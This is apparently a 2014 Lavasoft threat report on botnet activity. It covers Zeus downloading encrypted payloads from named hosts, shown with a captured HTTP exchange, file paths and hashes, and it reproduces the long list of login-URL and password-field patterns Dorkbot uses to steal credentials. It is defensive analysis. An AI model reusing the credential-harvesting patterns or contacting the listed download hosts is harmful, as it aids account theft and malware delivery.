Bot Review

Table: Bots under analysis (May 2014, Lavasoft MAS).

Bot distribution in May:

Kelihos. This month we see a significant increase of Kelihos backdoors discovered in the Lab: 58% in May against 8% in April. You can read more about adoption of anti-analysis techniques by Kelihos bot here.

Cycbot. You can find the latest Cycbot description here.

Shiz. The latest description is here.

Zbot. Read more about Zeus variant found in May in Malware Encyclopedia. 30% of all detected Zeus samples use Tor client.

The Zeus continues downloading its files in an encrypted form:

URL	IP
hxxp://highclassdelhiescorts.in/images/css/al0302.enc	103.8.127.189
hxxp://manjena.com/images/al0302.enc	184.107.194.106

This time the Canadian server replied with the ZZP file (329 288 bytes in size):

GET /images/al0302.enc HTTP/1.1

Accept: text/*, application/*

User-Agent: Updates downloader

Host: manjena.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 24 May 2014 06:00:28 GMT

Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6

Last-Modified: Mon, 03 Feb 2014 15:36:31 GMT

ETag: "a548037-50648-4f18249ad9dc0"

Accept-Ranges: bytes

Content-Length: 329288

Connection: close

Content-Type: text/plain

ZZP..~.:.T.tS...W.......S..vS..OJ.)w_..w....Z...S...r... ...!...2..W0.
..<..w1...&...S..3....<D..}..}w.GwWF:..'T....X..3 Q..3...pl6.wT.
..U6.upP.x|.TM...p[6..S...0..HFo.w...;R..P[. %V.!wP..|R..w;.....C~...u
CD..V..d...wS..1R...P..qQ^".2..x....FB.qP..w.m.w{..q..usr..o.H...G@.F.

<<< skipped >>>

After decryption with Zeus decryption tool (ZeusDecryptor) we discovered usual randomly named application (MD5: f1f03b73b6c32ef28514d740073a4941, 386 560 bytes in size):

%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe

The downloader also copies itself as “pdfupdate.exe” (MD5: 0a2947abe4c9e6d539066993690c8a38, 19 224 bytes in size) to the %Temp% folder and executes it.

NrgBot/Dorkbot. The number of Dorkbots continues growing since March. You can find the latest description here.

Currently the backdoor uses the following expressions to steal logins and passwords for popular services:

iknowthatgirl*/members*, *youporn.*/login*, *members.brazzers.com*, *bcointernacional*login*, *:2222/CMD_LOGIN*, *whcms*dologin* , *:2086/login*, *:2083/login*, *:2082/login*, *webnames.ru/*user_login*, Webnames, *dotster.com/*login*, loginid, *enom.com/login*, login.Pass, login.User, *login.Pass=*, *1and1.com/xml/config*, *moniker.com/*Login*, LoginPassword, LoginUserName, *LoginPassword=*, *namecheap.com/*login*, loginname, *godaddy.com/login*, Password, *Password=*, *alertpay.com/login*, *netflix.com/*ogin*, *thepiratebay.org/login*, *torrentleech.org/*login*, *vip-file.com/*/signin-do*, *sms4file.com/*/signin-do*, *letitbit.net*, *what.cd/login*, *oron.com/login*, *filesonic.com/*login*, *speedyshare.com/login*, *uploaded.to/*login*, *uploading.com/*login*, loginUserPassword, loginUserName, *loginUserPassword=*, *fileserv.com/login*, *hotfile.com/login*, *4shared.com/login*, txtpass, *txtpass=*, *netload.in/index*, *freakshare.com/login*, login_pass, *login_pass=*, *mediafire.com/*login*, *sendspace.com/login*, *megaupload.*/*login*, *depositfiles.*/*/login*, *signin.ebay*SignIn, *officebanking.cl/*login.asp*, *secure.logmein.*/*logincheck*, session[password], *password]=*, *twitter.com/sessions, txtPassword, *&txtPassword=*, *.moneybookers.*/*login.pl, *runescape*/*weblogin*, *&password=*, *no-ip*/login*, *steampowered*/login*, quick_password, *hackforums.*/member.php, *facebook.*/login.php*, *login.yahoo.*/*login*, passwd, login, *passwd=*, *login.live.*/*post.srf*, TextfieldPassword, *TextfieldPassword=*, *gmx.*/*FormLogin*, *Passwd=*, FLN-Password, *FLN-Password=*, *pass=*, *bigstring.*/*index.php*, *screenname.aol.*/login.psp*, password, loginId, *password=*, *aol.*/*login.psp*, Passwd, *google.*/*ServiceLoginAuth*, login_password, login_email, *login_password=*, *paypal.*/webscr?cmd=_login-submit*, *bebo.*/c/profile/comment_post.json, *bebo.*/mail/MailCompose.jsp*, *friendster.*/sendmessage.php*, *friendster.*/rpc.php, *vkontakte.ru/mail.php, *vkontakte.ru/wall.php, *vkontakte.ru/api.php, *facebook.*/ajax/*MessageComposerEndpoint.php*, msg_text, *facebook.*/ajax/chat/send.php*

We see the following online services attacked in the list above:

iknowthatgirl.com, youporn.com, brazzers.com, bancointernacional.com.ec, webnames.ru, dotster.com, enom.com, 1and1.com, moniker.com, namecheap.com, godaddy.com, alertpay.com, netflix.com, thepiratebay.org, torrentleech.org, vip-file.com, sms4file.com, letitbit.net, what.cd, oron.com, filesonic.com, speedyshare.com, uploaded.to, uploading.com, fileserv.com, hotfile.com, 4shared.com, netload.in, freakshare.com, mediafire.com, sendspace.com, megaupload.com, depositfiles.com, ebay.com, officebanking.cl, logmein.com, twitter.com, moneybookers.com, runescape.com, hackforums.com, facebook.com, yahoo.com, live.com, gmx.com, aol.com, google.com, paypal.com, bebo.com, friendster.com, vkontakte.ru, facebook.com

Among them we met porn websites, domain registrars, online banking services, file sharing services, online games, and popular social networks.

Blazebot/Rbot. The latest description is available in Malware Encyclopedia.

Read also:
Lavasoft Security Bulletin - May 2014: Top Threats.
Kelihos Adopts Anti-Analysis Technique.